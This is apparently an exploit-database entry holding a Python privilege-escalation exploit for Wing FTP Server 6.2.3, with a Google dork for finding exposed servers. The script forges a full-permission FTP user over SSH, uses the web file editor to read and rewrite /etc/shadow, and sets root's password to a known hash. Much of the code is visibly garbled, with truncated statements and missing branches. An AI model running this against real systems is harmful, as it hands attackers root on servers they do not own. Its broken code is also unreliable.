Wing FTP Server 6.2.3 Privilege Escalation

Related Vulnerabilities: CVE-2020-8635   CVE-2020-8634   CVE-2020-8635  
Publish Date: 02 Mar 2020
Author: Cary Hooper

                # Exploit Title: Wing FTP Server 6.2.3 - Privilege Escalation
# Google Dork: intitle:"Wing FTP Server - Web"
# Date: 2020-03-02
# Exploit Author: Cary Hooper
# Vendor Homepage:
# Software Link:
# Version: v6.2.3
# Tested on: Ubuntu 18.04, Kali Linux 4, MacOS Catalina, Solaris 11.4 (x86)

# Given SSH access to a target machine with Wing FTP Server installed, this program:
#  - SSH in, forges a FTP user account with full permissions (CVE-2020-8635)
#  - Logs in to HTTP interface and then edits /etc/shadow (resulting in CVE-2020-8634)
# Each step can all be done manually with any kind of code execution on target (no SSH)
# To setup, start SSH service, then run ./wftpserver.  Wing FTP services will start after a domain is created.
# (writeup)


#python3 -t -u lowleveluser -p demo --proxy

import paramiko,sys,warnings,requests,re,time,argparse
#Python warnings are the worst

#Argument handling begins
parser = argparse.ArgumentParser(description="Exploit for Wing FTP Server v6.2.3 Local Privilege Escalation",epilog=print(f"Exploit by @nopantrootdance."))
parser.add_argument("-t", "--target", help="hostname of target, optionally with port specified (hostname:port)",required=True)
parser.add_argument("-u", "--username", help="SSH username", required=True)
parser.add_argument("-p", "--password", help="SSH password", required=True)
parser.add_argument("-v", "--verbose", help="Turn on debug information", action='store_true')
parser.add_argument("--proxy", help="Send HTTP through a proxy",default=False)
args = parser.parse_args()

#Global Variables
global username
global password
global proxies
global port
global hostname
global DEBUG
username = args.username
password = args.password

#Turn on debug statements
if args.verbose:
  DEBUG = True
  DEBUG = False

#Handle nonstandard SSH port
if ':' in
  socket =':')
  hostname = socket[0]
  port = socket[1]
  hostname =
  port = "22"

#Prepare proxy dict (for Python requests)
if args.proxy:
  if ("http://" not in args.proxy) and ("https://" not in args.proxy):
    print(f"[!] Invalid proxy.  Proxy must have http:// or https:// {proxy}")
  proxies = {'http':args.proxy,'https':args.proxy}
  proxies = {}
#Argument handling ends

#This is what a <username>.xml file looks like.
#Gives full permission to user (h00p:h00p) for entire filesystem '/'.
#Located in $_WFTPROOT/Data/Users/
evilUserXML = """<?xml version="1.0" ?>
<USER_ACCOUNTS Description="Wing FTP Server User Accounts">
        <ExpireTime>2020-02-25 18:27:07</ExpireTime>
        <LastLoginTime>2020-01-26 18:27:28</LastLoginTime>

#Verbosity function.  
def log(string):
  if DEBUG != False:

#Checks to see which URL is hosting Wing FTP
#Returns a URL, probably. HTTPS preferred.  empty url is checked in main()
def checkHTTP(hostname):
  protocols= ["http://","https://"]
  for protocol in protocols:
      log(f"Testing HTTP service {protocol}{hostname}")
      response = requests.get(protocol + hostname, verify=False, proxies=proxies)
        #Server: Wing FTP Server
        if "Wing FTP Server" in response.headers['Server']:
          print(f"[!] Wing FTP Server found at {protocol}{hostname}")
          url = protocol + hostname
    except Exception as e:
      print(f"[*] Server is not running Wing FTP web services on {protocol}: {e}")
  return url

#Log in to the HTTP interface.  Returns cookie
def getCookie(url,webuser,webpass,headers):
  loginURL = f"{url}/loginok.html"
  data = {"username": webuser, "password": webpass, "username_val": webuser, "remember": "true", "password_val": webpass, "submit_btn": " Login "}
  response =, headers=headers, data=data, verify=False, proxies=proxies)
  ftpCookie = response.headers['Set-Cookie'].split(';')[0]
  print(f"[!] Successfully logged in!  Cookie is {ftpCookie}")
  cookies = {"UID":ftpCookie.split('=')[1]}
  log("return getCookie")
  return cookies

#Change directory within the web interface.
#The actual POST request changes state.  We keep track of that state in the returned directorymem array.
def chDir(url,directory,headers,cookies,directorymem):
  data = {"dir": directory}
  print(f"[*] Changing directory to {directory}")
  chdirURL = f"{url}/chdir.html", headers=headers, cookies=cookies, data=data, verify=False, proxies=proxies)
  log(f"Directorymem is nonempty. --> {directorymem}")
  log("return chDir")
  directorymem = directorymem + "|" + directory
  return directorymem 

#The application has a silly way of keeping track of paths.
#This function returns the current path as dirstring.
def prepareStupidDirectoryString(directorymem,delimiter):
  dirstring = ""
  directoryarray = directorymem.split('|')
  log(f"directoryarray is {directoryarray}")
  for item in directoryarray:
    if item != "":
      dirstring += delimiter + item
  log("return prepareStupidDirectoryString")
  return dirstring

#Downloads a given file from the server.  By default, it runs as root.
#Returns the content of the file as a string.
def downloadFile(file,url,headers,cookies,directorymem):
  print(f"[*] Downloading the {file} file...")
  dirstring = prepareStupidDirectoryString(directorymem,"$2f")  #Why wouldn't you URL-encode?!
  log(f"directorymem is {directorymem} and dirstring is {dirstring}")
  editURL = f"{url}/editor.html?dir={dirstring}&filename={file}&r=0.88304407485768"
  response = requests.get(editURL, cookies=cookies, verify=False, proxies=proxies)
  filecontent = re.findall(r'<textarea id="textedit" style="height:520px; width:100%;">(.*?)</textarea>',response.text,re.DOTALL)[0]
  log(f"downloaded file is: {filecontent}")
  log("return downloadFile")
  return filecontent,editURL

#Saves a given file to the server (or overwrites one).  By default it saves a file with
#644 permission owned by root.
def saveFile(newfilecontent,file,url,headers,cookies,referer,directorymem):
  log(f"Directorymem is {directorymem}")
  saveURL = f"{url}/savefile.html"
  headers = {"Content-Type": "text/plain;charset=UTF-8", "Referer": referer}
  dirstring = prepareStupidDirectoryString(directorymem,"/")
  log(f"Stupid Directory string is {dirstring}")
  data = {"charcode": "0", "dir": dirstring, "filename": file, "filecontent": newfilecontent}, headers=headers, cookies=cookies, data=data, verify=False)
  log("return saveFile")

#Other methods may be more stable, but this works.
#"You can't argue with a root shell" - FX
#Let me know if you know of other ways to increase privilege by overwriting or creating files.  Another way is to overwrite
#the Wing FTP admin file, then leverage the lua interpreter in the administrative interface which runs as root (YMMV).
#Mind that in this version of Wing FTP, files will be saved with umask 111.  This makes changing /etc/sudoers infeasible.

#This routine overwrites the shadow file
def overwriteShadow(url):
  headers = {"Content-Type": "application/x-www-form-urlencoded"}
  #Grab cookie from server.
  cookies = getCookie(url=url,webuser="h00p",webpass="h00p",headers=headers)

  #Chdir a few times, starting in the user's home directory until we arrive at the target folder
  directorymem = chDir(url=url,directory="etc",headers=headers,cookies=cookies,directorymem="")
  #Download the target file.
  shadowfile,referer = downloadFile(file="shadow",url=url,headers=headers,cookies=cookies,directorymem=directorymem)

  # openssl passwd -1 -salt h00ph00p h00ph00p
  rootpass = "$1$h00ph00p$0cUgaHnnAEvQcbS6PCMVM0"
  rootpass = "root:" + rootpass + ":18273:0:99999:7:::"

  #Create new shadow file with different root password & save
  newshadow = re.sub("root(.*):::",rootpass,shadowfile)
  print("[*] Swapped the password hash...")
  print("[*] Saved the forged shadow file...")
  log("exit overwriteShadow")

def main():
    #Create ssh connection to target with paramiko
    client = paramiko.SSHClient()
      client.connect(hostname, port=port, username=username, password=password)
      print(f"Failed to connect to {hostname}:{port} as user {username}.")
    #Find wftpserver directory
    print(f"[*] Searching for Wing FTP root directory. (this may take a few seconds...)")
    stdin, stdout, stderr = client.exec_command("find / -type f -name 'wftpserver'")
    wftpDir ="utf-8").split('\n')[0].rsplit('/',1)[0]
    print(f"[!] Found Wing FTP directory: {wftpDir}")
    #Find name of <domain>
    stdin, stdout, stderr = client.exec_command(f"find {wftpDir}/Data/ -type d -maxdepth 1")
    lsresult ="utf-8").split('\n')
    #Checking if wftpserver is actually configured.  If you're using this script, it probably is.
    print(f"[*] Determining if the server has been configured.")
    domains = []
    for item in lsresult[:-1]:
      item = item.rsplit('/',1)[1]
      if item !="_ADMINISTRATOR" and item != "":
        print(f"[!] Success. {len(domains)} domain(s) found! Choosing the first: {item}")
    domain = domains[0]
    #Check if the users folder exists
    userpath = wftpDir + "/Data/" + domain
    print(f"[*] Checking if users exist.")
    stdin, stdout, stderr = client.exec_command(f"file {userpath}/users")
    if "No such file or directory" in"utf-8"):
      print(f"[*] Users directory does not exist.  Creating folder /users")
      #Create users folder
      stdin, stdout, stderr = client.exec_command(f"mkdir {userpath}/users")
    #Create user.xml file
    print("[*] Forging evil user (h00p:h00p).")
    stdin, stdout, stderr = client.exec_command(f"echo '{evilUserXML}' > {userpath}/users/h00p.xml")
    #Now we can log into the FTP web app with h00p:h00p
    url = checkHTTP(hostname)
    #Check that url isn't an empty string (and that its a valid URL)
    if "http" not in url:
      print(f"[!] Exiting... cannot access web interface.")

    #overwrite root password
      print(f"[!] Overwrote root password to h00ph00p.")
    except Exception as e:
      print(f"[!] Error: cannot overwrite /etc/shadow: {e}")

    #Check to make sure the exploit worked.
    stdin, stdout, stderr = client.exec_command("cat /etc/shadow | grep root")
    out ='utf-8')
    err ='utf-8')

    log(f"STDOUT - {out}")
    log(f"STDERR - {err}")
    if "root:$1$h00p" in out:
      print(f"[*] Success!  The root password has been successfully changed.")
      print(f"\n\tssh {username}@{hostname} -p{port}")
      print(f"\tThen: su root (password is h00ph00p)")
      print(f"[!] Something went wrong... SSH in to manually check /etc/shadow.  Permissions may have been changed to 666.")

    log("exit prepareServer")
